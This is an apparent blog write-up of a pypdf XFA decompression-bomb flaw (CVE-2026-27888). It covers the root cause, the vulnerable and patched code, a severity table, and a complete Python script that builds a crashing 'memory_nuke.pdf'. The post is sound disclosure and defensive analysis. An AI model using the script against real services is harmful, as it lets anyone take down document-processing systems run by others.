Feb 26, 2026·5 min read·4 visits
pypdf versions prior to 6.7.3 are vulnerable to a Denial of Service attack via the `xfa` property. An attacker can craft a tiny PDF with a highly compressed stream that expands to gigabytes in memory, crashing the Python process.
A critical resource exhaustion vulnerability in the popular pypdf library allows attackers to crash applications by supplying a malicious PDF. The flaw lies in the handling of XML Forms Architecture (XFA) streams, where a 'zip bomb' technique can trigger unbounded memory allocation.
If you've been in security for more than five minutes, you know that parsing untrusted file formats is the digital equivalent of licking a subway pole. PDFs are particularly egregious offenders. They aren't just documents; they are containers for images, fonts, JavaScript, and—thanks to Adobe's enterprise legacy—XML Forms Architecture (XFA).
pypdf is the go-to pure-Python library for handling these monstrosities. It's used everywhere: from RAG (Retrieval-Augmented Generation) pipelines extracting text for LLMs, to automated invoice processing systems in fintech. It's convenient, easy to install, and usually robust.
But here's the catch: convenience often comes at the cost of safety. In CVE-2026-27888, we find a classic 'zip bomb' vulnerability hiding inside the complex structure of XFA data. An attacker can send you a PDF that looks innocent—maybe 10KB on disk—but when your Python script tries to read its metadata, it suddenly demands 10GB of RAM. The OS panics, the OOM killer wakes up, and your service goes dark. It’s a beautifully simple Denial of Service.
The root cause here isn't some complex heap grooming or race condition. It's a failure of imagination regarding input validation. The vulnerability lives in pypdf/_doc_common.py, specifically in how the library fetches XFA data.
PDFs store XFA forms as streams. To save space, these streams are compressed, usually with FlateDecode (zlib). When you access reader.xfa or writer.xfa, pypdf needs to decompress that stream to give you the XML content.
Here is the logic flaw: The developers assumed that if a stream existed, it should be decompressed in its entirety into a single Python bytes object. There were no guardrails. No checks to ask, "Hey, should this 5KB compressed blob really turn into a 4GB string?"
> [!NOTE] > In the world of data compression, high ratios are easy to achieve if the data is repetitive. A stream of a billion 'A's compresses down to almost nothing. If you blindly decompress it, you are handing the attacker a lever to exhaust your server's memory.
Let's look at the code. This is a perfect example of "it works until it doesn't." In versions prior to 6.7.3, the code looked something like this:
# pypdf/_doc_common.py (Vulnerable)
if isinstance(f, IndirectObject):
field = cast(Optional[EncodedStreamObject], f.get_object())
if field:
# The fatal line:
es = zlib.decompress(field._data)
retval[tag] = esSee that zlib.decompress(field._data)? That is a loaded gun pointed at your RAM. zlib will happily keep allocating memory until the decompression is finished or your kernel kills the process. It doesn't care that you're running on a t3.micro instance.
Now, look at the fix introduced in commit 7a4c8246ed. The maintainers introduced a wrapper that knows when to say "stop."
# pypdf/_doc_common.py (Fixed)
from .filters import _decompress_with_limit # <--- The Savior
if field:
# Safe decompression:
es = _decompress_with_limit(field._data)
retval[tag] = esThe _decompress_with_limit function uses zlib.decompressobj to decompress in chunks, tracking the total size and raising a LimitReachedError if it exceeds a predefined threshold (defaulting to a sane limit like 2GB or less, configurable via ZLIB_MAX_OUTPUT_LENGTH).
Exploiting this is trivial and requires no special tools—just a few lines of Python. We are going to build a valid PDF structure that contains a malicious XFA stream.
Here is the recipe for disaster:
zlib with the highest compression level (9)./XFA array of the PDF's /AcroForm dictionary.# The "I hate your RAM" PoC
from pypdf import PdfWriter
from pypdf.generic import NameObject, DictionaryObject, EncodedStreamObject, ArrayObject
import zlib
# 1. Generate 1GB of 'A's (this consumes RAM on the attacker machine temporarily)
# In a real weaponized script, we'd stream this into the zlib compressor.
payload = b'A' * (1024 * 1024 * 1024)
# 2. Compress it. This will shrink to a few KB.
compressed_data = zlib.compress(payload, level=9)
# 3. Build the PDF structure
writer = PdfWriter()
writer.add_blank_page(width=72, height=72)
# Create the stream object
stream = EncodedStreamObject()
stream._data = compressed_data
stream[NameObject("/Filter")] = NameObject("/FlateDecode")
# Attach it to the XFA dictionary
xfa_array = ArrayObject([stream])
acro_form = DictionaryObject()
acro_form[NameObject("/XFA")] = writer._add_object(xfa_array)
writer.root_object[NameObject("/AcroForm")] = writer._add_object(acro_form)
# 4. Save the bomb
with open("memory_nuke.pdf", "wb") as f:
writer.write(f)Now, send memory_nuke.pdf to any service that uses a vulnerable pypdf to inspect metadata. As soon as they access the xfa property... BOOM. The process hangs, memory usage spikes vertically, and the service dies.
Why is this a big deal? Because we automate everything. Modern document processing pipelines often accept uploads from the public internet (resumes, invoices, legal forms). These pipelines often run in memory-constrained environments like AWS Lambda or Kubernetes pods.
If your application uses pypdf to check for form fields (reader.get_form_text_fields() often interacts with XFA components internally) or simply tries to extract all metadata for indexing, a single malicious user can take down your worker nodes.
This isn't just a crash; in a shared hosting environment or a poorly isolated container, this memory pressure can affect other neighbors or lock up the host system entirely. It's a low-effort, high-impact asymmetric attack.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U| Product | Affected Versions | Fixed Version |
|---|---|---|
pypdf py-pdf | < 6.7.3 | 6.7.3 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v4.0 | 6.6 (Medium) |
| Attack Vector | Network / Local |
| Exploit Status | PoC Available |
| Impact | Denial of Service (DoS) |
| Affected Component | pypdf.PdfReader.xfa |